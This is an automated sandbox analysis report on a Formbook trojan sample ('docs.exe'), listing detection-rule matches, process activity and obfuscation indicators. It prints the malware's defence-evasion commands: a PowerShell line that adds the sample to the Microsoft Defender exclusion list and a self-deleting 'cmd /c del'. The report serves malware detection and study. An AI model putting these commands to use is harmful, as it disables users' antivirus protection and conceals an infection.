          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: docs.exe PID: 2672, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: docs.exe PID: 4620, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR | Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56
          Source: Process Memory Space: wscript.exe PID: 2224, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: docs.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: _0020.SetAccessControl
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs | Security API names: _0020.AddAccessRule
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, uSRLTvumudq6gGeKK7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.docs.exe.7370000.4.raw.unpack, uSRLTvumudq6gGeKK7.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/6@11/2
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_0058B52D FormatMessageW,LocalAlloc,GetLastError,swprintf_s,FormatMessageA,LocalAlloc,sprintf_s,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_005908FD CLSIDFromProgID,CoCreateInstance
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00596D75 FindResourceExW,LoadResource
          Source: C:\Users\user\Desktop\docs.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\docs.exe.logJump to behavior
          Source: C:\Users\user\Desktop\docs.exeMutant created: \Sessions\1\BaseNamedObjects\nWrVidnBYAfcOGgDbo
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5376:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5760:120:WilError_03
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrzyb2gx.gyv.ps1Jump to behavior
          Source: docs.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: docs.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
          Source: C:\Users\user\Desktop\docs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\docs.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: docs.exeReversingLabs: Detection: 44%
          Source: unknownProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SysWOW64\wscript.exe"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\docs.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: mscoree.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: dwrite.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: windowscodecs.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: amsi.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: propsys.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: edputil.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: iertutil.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: netutils.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: sspicli.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: wintypes.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: appresolver.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: slc.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: sppc.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\docs.exe | Section loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.internal.shell.broker.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: version.dll
          Source: C:\Windows\SysWOW64\wscript.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\docs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\docs.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: docs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: docs.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: docs.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wscript.pdbGCTL source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: docs.exe, docs.exe, 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2212919973.000000000470C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2215494344.00000000048B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wscript.pdb source: docs.exe, 00000005.00000002.2213093676.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, docs.exe, 00000005.00000002.2213646142.0000000000EC0000.00000040.10000000.00040000.00000000.sdmp, wscript.exe, wscript.exe, 00000008.00000002.4584030233.0000000000580000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: fdGd.pdbSHA256 source: docs.exe
          Source: Binary string: fdGd.pdb source: docs.exe

          Data Obfuscation

          Source: 0.2.docs.exe.56a0000.3.raw.unpack, MainForm.cs | .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.3fd9c80.0.raw.unpack, MainForm.cs | .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs | .Net Code: pUcdNfth0P System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.7370000.4.raw.unpack, gvZomwe6c5cc4pjo9P.cs | .Net Code: pUcdNfth0P System.Reflection.Assembly.Load(byte[])
          Source: 0.2.docs.exe.3ff1ea0.2.raw.unpack, MainForm.cs | .Net Code: _200E_200C_200B_202B_202E_200E_200E_202D_200B_206C_202C_202B_200B_200F_200E_206F_206C_202C_202D_200E_206E_206E_200C_206D_202C_200B_200E_202B_200B_206A_202E_206A_202E_206E_206E_206A_206C_206A_206F_202E_202E System.Reflection.Assembly.Load(byte[])
          Source: docs.exe | Static PE information: 0xDE85E6B9 [Tue Apr 20 16:35:05 2088 UTC]
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_013BDB28 pushad ; retf | 0_2_013BDB29
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_0548879C pushad ; ret | 0_2_054887A5
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_054831D0 pushad ; retf | 0_2_054831F1
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_054831F2 push esp; retf | 0_2_054831F9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_05486DC0 pushad ; ret | 0_2_05486DC9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 0_2_05487FD8 push eax; mov dword ptr [esp], edx | 0_2_05487FEC
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00416825 push ecx; iretd | 5_2_00416829
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_004168EA push ecx; ret | 5_2_004168F6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00417116 push ss; iretd | 5_2_00417118
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00417132 push ecx; iretd | 5_2_00417133
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041E9B2 push edx; iretd | 5_2_0041E9B3
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041EA0C push 6B25699Fh; iretd | 5_2_0041EA11
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00416B3D push ds; retf | 5_2_00416B4E
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0040A47D pushad ; ret | 5_2_0040A47E
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041D4D2 push eax; ret | 5_2_0041D4D8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041D4DB push eax; ret | 5_2_0041D542
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041D485 push eax; ret | 5_2_0041D4D8
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_0041D53C push eax; ret | 5_2_0041D542
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F1225F pushad ; ret | 5_2_00F127F9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F127FA pushad ; ret | 5_2_00F127F9
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F1283D push eax; iretd | 5_2_00F12858
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F409AD push ecx; mov dword ptr [esp], ecx | 5_2_00F409B6
          Source: C:\Users\user\Desktop\docs.exe | Code function: 5_2_00F11344 push eax; iretd | 5_2_00F11369
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE979B5 push esp; retn 0000h | 6_2_0FE97AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE97B02 push esp; retn 0000h | 6_2_0FE97B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0FE97B1E push esp; retn 0000h | 6_2_0FE97B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_1047E9B5 push esp; retn 0000h | 6_2_1047EAE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_1047EB02 push esp; retn 0000h | 6_2_1047EB03
          Source: C:\Windows\explorer.exe | Code function: 6_2_1047EB1E push esp; retn 0000h | 6_2_1047EB1F
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_00597C89 push ecx; ret | 8_2_00597C9C
          Source: C:\Windows\SysWOW64\wscript.exe | Code function: 8_2_04A627FA pushad ; ret | 8_2_04A627F9
          Source: docs.exe | Static PE information: section name: .text entropy: 7.646714228019074
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, W0CO6nx2lbf45N3dZB.cs | High entropy of concatenated method names: 'FyeSHy7wOY', 'PPnSaJ1JJc', 'PmkSx4D3VE', 'ADDSq7VDix', 'oygSXmHHB8', 'DrbSkbtbqM', 'mxeSBtV43o', 'EbRSm9wnxa', 'QVtSLfYees', 'F2dS95MGMW'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, gvZomwe6c5cc4pjo9P.cs | High entropy of concatenated method names: 'dTvipCo47p', 'XU7iJM33cp', 'Grbi3tdaMX', 'IyFi4dpTkd', 'HZFi6tHkmI', 'IRAiMVjBI6', 'P7Mi860EgN', 'fQUieBZaJZ', 'HHiiZdn7Gu', 'A88iYreIIk'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, QusdL9AWQuEDZLo2qk.cs | High entropy of concatenated method names: 'DgHKu8g4if', 'gJQKtp4MEd', 'eEQKWTZr40', 'hP7KXtcaO8', 'vSgKBKc5Y0', 'z5mKmnxyIJ', 'fDaK9bqd18', 'guLKw57hmH', 'Kx1KH893xF', 'P0OKQtgFCy'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, C382v4CSP1CfdGk3jL.cs | High entropy of concatenated method names: 'ToString', 'ShLyQDWB75', 'kucyXA7cLE', 'KK6ykwWp79', 'gxRyBREn2w', 'TNhym7Uks1', 'PiJyLa7jSa', 'mTPy95KASi', 'XYIywWJQkX', 'pL7y2uf49l'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, xOJxjE3K2SamCagQoj.cs | High entropy of concatenated method names: 'Dispose', 'vPS0rXSqae', 'ECbOXPH9c4', 'JNdnnpC6YC', 'DhU0F5tktt', 'j790zGAr8E', 'ProcessDialogKey', 'XK9O1BA7Yf', 'cHKO0ADt4q', 'TvGOOHKABq'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, NKABqoFswAiiVih8OX.cs | High entropy of concatenated method names: 'SFph0TKJgS', 'fBbhiJeAdS', 'oMFhdd7P1K', 'yLXhJJdKHO', 'GVSh3QUaEt', 'upkh62rbwp', 'JUyhMe40Fc', 'CvvEgBd72s', 'fe0EnSXsXM', 'r2OErvta3G'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, WcvWMqPxe6glMxDFWx.cs | High entropy of concatenated method names: 'iKRIYnvWGk', 'sH8IsAX9Zt', 'ToString', 'a0RIJmDKij', 'Cw4I3rJdhv', 'qjvI4n4j7u', 'GljI6ipwLj', 'UVvIMjVErL', 'dGwI80qXCR', 'xWKIeTWRNM'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, uSRLTvumudq6gGeKK7.cs | High entropy of concatenated method names: 'tHH3xKyoEn', 'wVM3qeFfto', 'MT63CTSNBS', 'rRE3PqcZOI', 'IAt3DjcHA3', 'GiK352som4', 'bTV3gHHbrU', 'FD13nNawND', 'OsE3ryFAIO', 'bpQ3FNKhvZ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LBA7YfrOHKADt4qPvG.cs | High entropy of concatenated method names: 'zjkEW3rcyB', 'wl5EXEeuHH', 'TSMEkAPVnC', 'QTaEBxrcyh', 'MgeExtGkXA', 'wwiEmIeH4I', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, aqVL7cOYT5UyxcIhT9.cs | High entropy of concatenated method names: 'VlcNITTaM', 'P0qGaSCiS', 'wMOT4WKl9', 'II1j4h3P7', 'Apxtg2a0r', 'sUoUWtidq', 'xJC3XUdxdof3RiglQw', 'zrPYEvRjV0CmWOhGjB', 'gKFEZ4oWw', 'SDlvDmYoo'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, IOx5x401yRp3CI6OJ3d.cs | High entropy of concatenated method names: 'M78hlYP6Y6', 'pfRhV5owIT', 'JfShNyPEUX', 'xqOhGdrAHx', 'qqehbF3nkK', 'klghT0d7pp', 'Dh3hjLN0kp', 'rfwhuEs08W', 'QkbhtLNbVL', 'EWDhUmTHlZ'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, VlBf5Ft4kYSmppGMuQ.cs | High entropy of concatenated method names: 'aZX4G9ZEYh', 'yqu4TCwedR', 'aNo4uXFpKK', 'h3s4tRPnc3', 'D8x4SNAbvR', 'gpc4yM2x9T', 'wr14IbVYvv', 'Hj04Ew0y6q', 'x6F4hwJtch', 'RmV4vv6TV6'
          Source: 0.2.docs.exe.4a4c550.1.raw.unpack, LDZDcM2Nou0J0HoJor.cs | High entropy of concatenated method names: 'GJm8ltcUyg', 'Jaw8VtiUZK', 'FYM8N9BOCb', 'MsM8GU1b0K', 'i3a8bOVUSI', 'IZn8TFT8bX', 'fTB8jMVS28', 'VIO8uoLSx3', 'hZp8tkQEoS', 'YVA8UEcHnw'
